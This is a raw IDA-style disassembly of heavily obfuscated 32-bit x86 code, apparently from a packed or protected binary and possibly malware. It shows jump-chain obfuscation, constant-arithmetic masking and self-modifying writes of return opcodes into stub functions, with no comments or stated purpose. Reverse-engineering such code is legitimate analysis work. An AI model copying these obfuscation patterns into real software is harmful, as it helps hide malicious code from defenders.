; START	OF FUNCTION CHUNK FOR sub_43BFAE

loc_4491D2:				; CODE XREF: sub_43BFAE:loc_4560D3j
		mov	[esi], eax
		pop	esi
		xor	eax, eax
		mov	[ebp-28h], eax
		call	sub_43CB02
; END OF FUNCTION CHUNK	FOR sub_43BFAE
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_4491DF:				; CODE XREF: sub_4429DD+6163j
		jmp	loc_452235
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_4491E4:				; CODE XREF: sub_44B86B-8157j
		jmp	loc_44E59E
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
		jb	loc_43F3EE
		cmp	ebp, 0B5004EDh
		jmp	loc_454562
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_329. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		rol	esi, 3
		jmp	sub_45C21C
; ---------------------------------------------------------------------------
		push	9D013Ch
		jmp	sub_451722
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_44920D:				; CODE XREF: sub_448CAE+AF88j
		popf

loc_44920E:				; CODE XREF: sub_442F42:loc_4505BAj
		push	0D3D888h
		pop	eax
		and	eax, 2E45A30h
		jmp	loc_4480B3
; END OF FUNCTION CHUNK	FOR sub_448CAE

; =============== S U B	R O U T	I N E =======================================



sub_44921F	proc near		; DATA XREF: sub_444F61+13549o

; FUNCTION CHUNK AT 00444F4C SIZE 0000000B BYTES

		mov	eax, 1
		jmp	loc_444F4C
sub_44921F	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	eax, offset nullsub_11
		mov	byte ptr [eax],	0C3h
		call	sub_45405E
		jb	loc_43DEFD
		mov	edx, 0A22F8A70h
		call	sub_455DD8
		mov	ds:dword_449C1C, eax
		jmp	loc_4580AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_449251:				; CODE XREF: sub_4552EB:loc_44C6F4j
		pop	eax

loc_449252:				; CODE XREF: sub_444463:loc_44154Ej
		and	eax, 325CCD62h
		rol	eax, 2
		xor	eax, 523C27C8h
		and	eax, 0F88BACB3h
		jmp	loc_452C73
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_44926C:				; CODE XREF: sub_448DCA+10479j
		ror	esi, 1
		jo	loc_44877E
		or	ecx, 93B740DEh

loc_44927A:				; CODE XREF: sub_448DCA:loc_45923Bj
		add	eax, 99BD71CCh

loc_449280:				; CODE XREF: y2kk37jd:loc_450A38j
		add	eax, ebp
		add	eax, 294E3C6Dh
		jmp	loc_44AAD9
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------

loc_44928D:				; DATA XREF: sub_45380A:loc_441D73o
		call	sub_44884D
		test	eax, eax
		jz	loc_448B33
		jmp	loc_455E38
; ---------------------------------------------------------------------------

loc_44929F:				; CODE XREF: y2kk37jd:00455D04j
					; y2kk37jd:0045838Bj
		pushf
		push	34DF7C4Eh
		not	ebx
		jmp	loc_44F8D9
; ---------------------------------------------------------------------------

loc_4492AC:				; CODE XREF: y2kk37jd:loc_43B013j
					; y2kk37jd:0043B036j
		xor	ecx, 0ECA7C0B7h
		add	ecx, ebp
		push	offset sub_44479B
		jmp	locret_43B67B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_4492BE:				; CODE XREF: sub_4477A2:loc_443211j
					; sub_4477A2-4582j
		add	eax, 8E66E67Eh
		sub	eax, 0C3E5B57Eh
		xor	eax, 0B8FEA818h
		push	eax
		push	offset sub_447423
		jmp	nullsub_92
; END OF FUNCTION CHUNK	FOR sub_4477A2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D1D4

loc_4492DC:				; CODE XREF: sub_44D1D4+17j
		jmp	loc_442C21
; END OF FUNCTION CHUNK	FOR sub_44D1D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B24F

loc_4492E1:				; CODE XREF: sub_44B24F+1Cj
		jmp	loc_43D04B
; END OF FUNCTION CHUNK	FOR sub_44B24F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_4492E6:				; CODE XREF: sub_43DD0E+10j
		jmp	loc_455C16
; END OF FUNCTION CHUNK	FOR sub_43DD0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4492EB:				; CODE XREF: sub_44AC89-F3D5j
		jmp	loc_44E22D
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		or	edx, ebx
		jmp	loc_43E16C

; =============== S U B	R O U T	I N E =======================================



sub_4492F7	proc near		; CODE XREF: y2kk37jd:0044F19Cj
					; sub_44D302:loc_45929Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C9FC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043E332 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440E91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044241D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442FE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443C52 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444DE4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444E7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D7A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044719E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ADA6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D311 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D90C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452875 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456F93 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458880 SIZE 0000000E BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		jnz	loc_446D7A
		cmp	dword ptr [ebp-1Ch], 66h
		jnz	loc_452875
		mov	eax, 6
		sub	eax, [ebp-0Ch]
		mov	[ebp-0Ch], eax
		jmp	loc_444E7E
sub_4492F7	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_424. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44931C	proc near		; CODE XREF: sub_443EAB-3E9Cp
					; y2kk37jd:0044902Ej

; FUNCTION CHUNK AT 0043C507 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444B97 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445D66 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00454ED3 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	12220FDEh
		pop	eax
		and	eax, 0F5ADBC20h
		add	eax, 1B906030h
		jmp	loc_445D66
sub_44931C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	edi, 24388FABh
		jmp	sub_443992
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_449342:				; CODE XREF: sub_4448E2:loc_43FD34j
		push	edx
		push	edi
		push	0ECDAEEE2h
		pop	edi
		or	edi, 932A716Ah
		add	edi, offset byte_494BFB
		xchg	edi, [esp+0Ch+var_C]
		jmp	sub_455BE9
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_44935E:				; CODE XREF: sub_44D6A5+169Fj
		mov	ds:dword_446B98, eax
		retn
; ---------------------------------------------------------------------------

loc_449365:				; CODE XREF: sub_44D6A5-9EF8j
		rol	eax, 8
		push	eax
		jmp	nullsub_75
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44936E:				; CODE XREF: sub_445226+4A40j
		cmp	ebp, edx
		jmp	loc_4556A4
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	edx, 6A74FD15h
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		jmp	loc_454C8B
; ---------------------------------------------------------------------------
		xor	ebx, 18628B3Bh
		jmp	sub_4505A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E1C

loc_449390:				; CODE XREF: sub_445E1C+27B4j
		jz	loc_44DA5A
; END OF FUNCTION CHUNK	FOR sub_445E1C
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_449396:				; CODE XREF: sub_451E9F-DCA5j
		jmp	loc_44BA73
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_44939B:				; CODE XREF: sub_443360+9j
		jmp	loc_44EBF0
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B30

loc_4493A0:				; CODE XREF: sub_450B30-11819j
		jmp	loc_45A51A
; END OF FUNCTION CHUNK	FOR sub_450B30
; ---------------------------------------------------------------------------
		xchg	edi, edx
		jmp	loc_458402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_4493AC:				; CODE XREF: sub_45380A:loc_453D3Aj
		sbb	ebx, 0B14885BFh
		sub	eax, ecx
		jmp	loc_441D73
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
		mov	eax, 4AC5B528h
		call	sub_442C3E
		mov	ds:dword_41E080, eax
		lea	eax, nullsub_236
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B7FB

; =============== S U B	R O U T	I N E =======================================



sub_4493D7	proc near		; CODE XREF: sub_41C7BA+2D5p
					; y2kk37jd:00447579j ...
		call	sub_43D005
		jmp	ds:off_41E084
sub_4493D7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_4493E2:				; CODE XREF: sub_44B924+1Aj
		jmp	loc_43B640
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_4493E7:				; CODE XREF: sub_457533-CC05j
		jmp	loc_44B135
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4459CC

loc_4493EC:				; CODE XREF: sub_4459CC:loc_4442AFj
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	4FD72F64h
		pop	eax
		or	eax, 1CEAA4AFh
		jmp	loc_4405D9
; END OF FUNCTION CHUNK	FOR sub_4459CC
; ---------------------------------------------------------------------------

loc_449403:				; CODE XREF: y2kk37jd:0045284Dj
		cmp	esi, eax
		jmp	loc_44D873
; ---------------------------------------------------------------------------

loc_44940A:				; DATA XREF: sub_4551F1+Co
		add	eax, 0F30ABFB9h
		mov	eax, [eax]
		mov	eax, [eax]
		shl	eax, 3

loc_449417:				; CODE XREF: y2kk37jd:loc_45B2A8j
		call	sub_44D5ED
; START	OF FUNCTION CHUNK FOR sub_44A317

loc_44941C:				; CODE XREF: sub_44A317+11601j
		jmp	sub_4460D0
; END OF FUNCTION CHUNK	FOR sub_44A317
; ---------------------------------------------------------------------------

loc_449421:				; CODE XREF: y2kk37jd:00444985j
		jmp	locret_45271C
; ---------------------------------------------------------------------------
		dw 0EF0Bh
		dd 83068A0Fh, 81990000h, 851440C1h, 240C8700h, 106BDE9h
					; CODE XREF: y2kk37jd:loc_44ECCEj
		dd 158B4800h, 450BC8h, 0FF6BD0E9h, 92E281FFh, 8BA6E2EDh
		db 32h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_449451:				; CODE XREF: sub_44201B:loc_45BC4Ej
		add	edx, 0CDCEB12Dh
		add	edx, ebp
		push	ecx
		push	5D3EB146h
		pop	ecx
		jmp	loc_45B4EF
; END OF FUNCTION CHUNK	FOR sub_44201B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BAF2

loc_449466:				; CODE XREF: sub_43BAF2+D1F5j
		jmp	loc_45A075
; END OF FUNCTION CHUNK	FOR sub_43BAF2
; ---------------------------------------------------------------------------

loc_44946B:				; CODE XREF: y2kk37jd:00441BAFj
		xor	ecx, edx
		jz	loc_44E09D
		push	offset loc_43C224
		jmp	locret_45997D
; ---------------------------------------------------------------------------

loc_44947D:				; DATA XREF: y2kk37jd:00457B70o
		test	eax, eax
		jz	loc_44D501
		jmp	loc_446BBA

; =============== S U B	R O U T	I N E =======================================



sub_44948A	proc near		; CODE XREF: sub_4458DD:loc_453E1Ej

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044A8D5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045435D SIZE 00000005 BYTES

		push	ebx
		push	2FA63B75h
		pop	ebx
		add	ebx, ds:4000EDh
		sub	ebx, 48A65989h
		js	loc_44A8D5

loc_4494A3:				; CODE XREF: y2kk37jd:0045966Dj
		jmp	nullsub_186
sub_44948A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_4494A8:				; CODE XREF: sub_44610D+C247j
		jmp	loc_441B3B
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4494AD:				; CODE XREF: sub_4448E2:loc_4591FAj
		pop	ebp
		jmp	loc_45B83E
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_4494B4:				; CODE XREF: sub_4514DE+10j
		jnz	loc_443F3F
		jmp	loc_4595EF
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4494BF:				; CODE XREF: sub_43C851+F980j
		xchg	esi, [esp-4+arg_0]
		mov	edi, eax
		xchg	edi, [esp-4+arg_0]
		mov	eax, [ebp-14h]
		push	eax
		push	esi
		jmp	loc_44B126
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_4494D1:				; CODE XREF: sub_43F911-277Aj
		jl	loc_44D8C0
		xchg	eax, [ecx]

loc_4494D9:				; CODE XREF: sub_43F911:loc_451FB1j
		push	0C0B2AF6Fh
		pop	eax
		rol	eax, 1Ah
		jmp	loc_44302C
; END OF FUNCTION CHUNK	FOR sub_43F911
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_290. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4494E8:				; CODE XREF: y2kk37jd:004479CEj
		jmp	loc_44B2A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F930

loc_4494ED:				; CODE XREF: sub_44F930+1Cj
		push	esi
		push	7E02F89Dh
		pop	esi
		sub	esi, 0A2528009h
		xor	esi, 46178D53h
		add	esi, 629C1430h
		jmp	loc_45391A
; END OF FUNCTION CHUNK	FOR sub_44F930
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_44950B:				; CODE XREF: sub_453B0B-143B3j
		jge	loc_444C6B
		mov	ebx, ecx
		sbb	edx, ebp
		jle	loc_45B8A8
		jmp	loc_444C6A
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------

loc_449520:				; CODE XREF: y2kk37jd:00457E3Bj
		pushf
		adc	esi, 0A34C6337h
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_449527:				; CODE XREF: sub_4477A2:loc_457E25j
		add	edi, 75FC0623h
		xchg	edi, [esp+8+var_8]
		jmp	nullsub_20
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445FFF

loc_449535:				; CODE XREF: sub_445FFF+16j
		rol	eax, 1Ah
		sub	eax, 5A6CC846h
		add	eax, 78C4482Ch
		call	sub_44113A
		push	offset sub_44C894
		jmp	loc_43CAB8
; END OF FUNCTION CHUNK	FOR sub_445FFF
; ---------------------------------------------------------------------------

loc_449553:				; CODE XREF: y2kk37jd:0043F0F3j
		or	ebx, ecx
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_449555:				; CODE XREF: sub_43F346:loc_43F0D9j
		xor	eax, 743D050Ah
		add	eax, 9B5AC9B3h
		xor	eax, 1930503h
		add	eax, ebp
		push	esi
		push	5C887228h
		pop	esi
		jmp	loc_44D671
; END OF FUNCTION CHUNK	FOR sub_43F346
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_250. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC8D

loc_449576:				; CODE XREF: sub_45AC8D+14j
		jmp	loc_44DDD4
; END OF FUNCTION CHUNK	FOR sub_45AC8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EDF8

loc_44957B:				; CODE XREF: sub_44EDF8-50E8j
		jmp	nullsub_491
; END OF FUNCTION CHUNK	FOR sub_44EDF8
; ---------------------------------------------------------------------------

loc_449580:				; DATA XREF: sub_445C40:loc_456080o
		call	sub_4448E2
		push	0DCB59C35h
		pop	eax
		add	eax, 1D90D3A5h
		test	eax, 40000000h
		jmp	loc_440867
; ---------------------------------------------------------------------------

loc_44959C:				; CODE XREF: y2kk37jd:loc_44A619j
		or	edx, 0DB757C6Fh
		add	edx, 20C77779h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_451ADD
		jmp	loc_4534C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_4495B7:				; CODE XREF: sub_43E679+12j
		jl	loc_44699E

loc_4495BD:				; CODE XREF: sub_43BD0D+1F6A5j
		jmp	loc_441AC7
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_4495C2:				; CODE XREF: sub_44DC38+Ej
		jmp	loc_445F97
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------
		cmp	edx, eax
		jmp	loc_44102B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4495CE:				; CODE XREF: sub_4458DD:loc_44794Cj
		jz	loc_44B4CC

loc_4495D4:				; CODE XREF: sub_4460D0+11518j
		jmp	loc_44157F
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------

loc_4495D9:				; CODE XREF: y2kk37jd:0043E8D5j
		jmp	loc_44347E
; ---------------------------------------------------------------------------

loc_4495DE:				; CODE XREF: y2kk37jd:0043C9E2j
		jmp	loc_440D9B
; ---------------------------------------------------------------------------
		pop	ebx
		popf
		jmp	loc_44B4CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F7C

loc_4495EA:				; CODE XREF: sub_447F7C+1j
		push	2E4351BAh
		pop	ebx
		or	ebx, 15FC13DFh
		and	ebx, 0B95A1845h
		xor	ebx, 0F1C1D0C0h
		jmp	loc_4506BB
; END OF FUNCTION CHUNK	FOR sub_447F7C

; =============== S U B	R O U T	I N E =======================================



sub_449607	proc near		; DATA XREF: sub_43DA43:loc_44A07Fo
		mov	[edi], eax
		pop	edi
sub_449607	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44960A:				; CODE XREF: sub_453867-15567j
					; sub_43EF4F+6j
		jz	loc_43C7E6
		ror	eax, 14h
		push	ecx
		push	0E43817F9h
		pop	ecx
		jmp	loc_458755
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44961F:				; CODE XREF: sub_445226+264j
					; y2kk37jd:0044C77Bj
		or	edx, 86AA59F0h
		sub	edx, 0F7396441h
		or	edx, 79C2758Eh
		add	edx, 64EE8DDh
		push	offset sub_43BA28
		jmp	loc_448AE2
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_449641	proc near		; DATA XREF: sub_4458DD:loc_451B56o

; FUNCTION CHUNK AT 0043E9DE SIZE 00000005 BYTES

		xor	eax, esi
		xchg	eax, [esp+0]

loc_449646:				; CODE XREF: y2kk37jd:loc_44B943j
		mov	esi, eax
		pop	eax
		add	eax, 9B32CBD1h
		push	offset loc_43D813
		jmp	loc_43E9DE
sub_449641	endp

; ---------------------------------------------------------------------------
		pushf
		jmp	loc_450F3A
; ---------------------------------------------------------------------------

loc_44965F:				; CODE XREF: y2kk37jd:loc_44BA6Ej
		mov	ebp, eax
		mov	eax, 68629091h
		jmp	loc_448051
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_418. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44966C	proc near		; DATA XREF: y2kk37jd:0044ED67o

; FUNCTION CHUNK AT 0043D958 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443683 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445FE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004472FF SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045AE3F SIZE 00000005 BYTES

		push	70164836h
		pop	esi
		add	esi, 0BFF686Dh
		or	esi, 0F5CC4395h
		cmp	esi, 0B8814276h
		jmp	loc_445FE5
sub_44966C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C56D

loc_449689:				; CODE XREF: sub_44C56D+54Dj
		add	eax, 68C869EFh
		xor	eax, ds:4000E8h
		add	eax, 3455C675h
		call	sub_4569FB
; END OF FUNCTION CHUNK	FOR sub_44C56D
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_4496A0:				; CODE XREF: sub_457A46-3179j
		jmp	loc_445F2B
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4496A5:				; CODE XREF: sub_453867:loc_44B36Fj
		and	esi, ebp
		jmp	loc_447922
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_4496AC:				; CODE XREF: y2kk37jd:loc_457F1Ej
		call	sub_453855
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_4496B1:				; CODE XREF: sub_44AAA1-71AFj
		jmp	loc_44AF84
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------

loc_4496B6:				; CODE XREF: y2kk37jd:004413DEj
		jmp	loc_44A4D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_4496BB:				; CODE XREF: sub_43B4EE+377Bj
		jmp	loc_44F52B
; END OF FUNCTION CHUNK	FOR sub_43B4EE
; ---------------------------------------------------------------------------

loc_4496C0:				; CODE XREF: y2kk37jd:0043E9CDj
		sbb	esi, eax

; =============== S U B	R O U T	I N E =======================================



sub_4496C2	proc near		; CODE XREF: sub_4480CB-649Cp

; FUNCTION CHUNK AT 0044B3E2 SIZE 00000023 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 0ACFC5612h
		call	sub_442C3E
		push	ebx
		push	0BAF9B3C3h
		pop	ebx
		jmp	loc_44B3E2
sub_4496C2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4496DD:				; CODE XREF: sub_445226:loc_44EFC0j
		jz	loc_43DCB2
		jmp	loc_455551
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_4496E8:				; CODE XREF: sub_44C304:loc_453191j
		rol	esi, 1Dh
		or	esi, 0E72F1AC6h
		add	esi, 18D4759Dh
		popf
		xchg	esi, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44C304
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_364. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D005

loc_449701:				; CODE XREF: sub_43D005+Cj
		jmp	loc_458C39
; END OF FUNCTION CHUNK	FOR sub_43D005
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEC8

loc_449706:				; CODE XREF: sub_44EEC8:loc_44F325j
		sbb	ecx, ebp
		pop	ebp
		mov	[eax], ebx
		jmp	loc_44D331
; END OF FUNCTION CHUNK	FOR sub_44EEC8
; ---------------------------------------------------------------------------
		call	sub_43BA66
		or	eax, eax
		jnz	loc_45AD2C
		jmp	loc_446AA5
; ---------------------------------------------------------------------------

loc_449722:				; CODE XREF: y2kk37jd:00444CDEj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_481
; ---------------------------------------------------------------------------
		pop	edx

loc_44972B:				; CODE XREF: y2kk37jd:0043DFE4j
		mov	eax, [esp]
		push	ebx
		jmp	loc_43FAF0

; =============== S U B	R O U T	I N E =======================================



sub_449734	proc near		; CODE XREF: sub_452DF1+4j

; FUNCTION CHUNK AT 0043DAFC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044030D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004422F9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004470B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450EB2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004512C5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454F99 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BDEC SIZE 0000000B BYTES

		push	ebx
		push	7D29B434h
		pop	ebx
		sub	ebx, 0BDC328D8h
		add	ebx, 0D1329B63h
		jmp	loc_454F99
sub_449734	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44974C:				; CODE XREF: sub_43EF4F+CC77j
		jz	loc_452A5A
		jmp	loc_441F2B
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_449757:				; CODE XREF: sub_448DCA:loc_4510D6j
		xchg	eax, [esp-0Ch+arg_8]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0FF787A8Ah
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_449765	proc near		; CODE XREF: sub_448159+5p
		xchg	esi, [esp+0]
		pop	esi
		call	sub_4526B7
		jmp	nullsub_216
sub_449765	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454692

loc_449773:				; CODE XREF: sub_454692+9j
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_454692

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_449775	proc near		; CODE XREF: y2kk37jd:0043E29Ap
					; y2kk37jd:00441348p ...

; FUNCTION CHUNK AT 00447711 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D19E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459398 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		jmp	loc_44D19E
sub_449775	endp


; =============== S U B	R O U T	I N E =======================================



sub_44977F	proc near		; DATA XREF: sub_44E4A5+11o

; FUNCTION CHUNK AT 0044296A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A6B0 SIZE 00000005 BYTES

		call	nullsub_11
		call	sub_45405E
		mov	edx, 0CF0182F6h
		call	sub_455DD8
		jmp	loc_44A6B0
sub_44977F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448306

loc_449798:				; CODE XREF: sub_448306:loc_45B144j
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		add	esp, 0FFFFFF90h
		call	sub_45405E
		push	8962501Ch
		pop	edx
		jmp	loc_4519DD
; END OF FUNCTION CHUNK	FOR sub_448306

; =============== S U B	R O U T	I N E =======================================



sub_4497B0	proc near		; CODE XREF: sub_448DCA+51FAj
					; sub_4562E5:loc_458515j

; FUNCTION CHUNK AT 0043CEAB SIZE 00000008 BYTES

		push	ebx
		push	3C4C9264h
		pop	ebx
		add	ebx, 0D9A48E4Ch
		or	ebx, 0F4E01820h
		xor	ebx, 743A38EEh
		and	ebx, 0E8F2A978h
		add	ebx, 7F82E12Fh
		jmp	loc_43CEAB
sub_4497B0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4497DA	proc near		; DATA XREF: y2kk37jd:0044F6B5o

; FUNCTION CHUNK AT 0044841F SIZE 00000005 BYTES

		lea	eax, loc_45A1CE
		mov	byte ptr [eax],	0C3h
		jmp	loc_44841F
sub_4497DA	endp


